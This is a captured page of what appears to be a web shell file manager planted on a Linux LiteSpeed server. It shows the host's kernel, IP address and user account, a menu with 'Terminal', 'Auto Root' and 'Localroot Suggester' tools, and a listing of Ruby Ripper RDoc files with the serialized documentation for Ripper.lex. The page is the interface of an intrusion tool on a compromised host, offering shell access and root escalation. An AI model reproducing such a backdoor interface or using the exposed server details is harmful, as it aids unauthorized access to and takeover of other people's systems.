Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby21 /
share /
ri /
2.1.0 /
system /
Ripper /
Delete
Unzip
Name
Size
Permission
Date
Action
Filter
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
cdesc-Ripper.ri
4.56
KB
-rw-r--r--
2023-07-26 17:51
column-i.ri
382
B
-rw-r--r--
2023-07-26 17:51
compile_error-i.ri
355
B
-rw-r--r--
2023-07-26 17:51
encoding-i.ri
340
B
-rw-r--r--
2023-07-26 17:51
end_seen%3f-i.ri
364
B
-rw-r--r--
2023-07-26 17:51
filename-i.ri
340
B
-rw-r--r--
2023-07-26 17:51
lex-c.ri
1.02
KB
-rw-r--r--
2023-07-26 17:51
lineno-i.ri
380
B
-rw-r--r--
2023-07-26 17:51
new-c.ri
575
B
-rw-r--r--
2023-07-26 17:51
parse-c.ri
435
B
-rw-r--r--
2023-07-26 17:51
parse-i.ri
342
B
-rw-r--r--
2023-07-26 17:51
sexp-c.ri
968
B
-rw-r--r--
2023-07-26 17:51
sexp_raw-c.ri
1.04
KB
-rw-r--r--
2023-07-26 17:51
slice-c.ri
916
B
-rw-r--r--
2023-07-26 17:51
tokenize-c.ri
559
B
-rw-r--r--
2023-07-26 17:51
warn-i.ri
394
B
-rw-r--r--
2023-07-26 17:51
warning-i.ri
402
B
-rw-r--r--
2023-07-26 17:51
yydebug%3d-i.ri
316
B
-rw-r--r--
2023-07-26 17:51
yydebug-i.ri
324
B
-rw-r--r--
2023-07-26 17:51
Save
Rename
U:RDoc::AnyMethod[iI"lex:EFI"Ripper::lex;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"BTokenizes the Ruby program and returns an array of an array, ;TI"Jwhich is formatted like <code>[[lineno, column], type, token]</code>.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"require 'ripper' ;TI"require 'pp' ;TI" ;TI"'pp Ripper.lex("def m(a) nil end") ;TI"* #=> [[[1, 0], :on_kw, "def"], ;TI"* [[1, 3], :on_sp, " " ], ;TI"* [[1, 4], :on_ident, "m" ], ;TI"* [[1, 5], :on_lparen, "(" ], ;TI"* [[1, 6], :on_ident, "a" ], ;TI"* [[1, 7], :on_rparen, ")" ], ;TI"* [[1, 8], :on_sp, " " ], ;TI"* [[1, 9], :on_kw, "nil"], ;TI"* [[1, 12], :on_sp, " " ], ;TI") [[1, 13], :on_kw, "end"]];T:@format0: @fileI"#ext/ripper/lib/ripper/lexer.rb;T:0@omit_headings_from_table_of_contents_below000[ I"&(src, filename = '-', lineno = 1);T@ FI"Ripper;TcRDoc::NormalClass00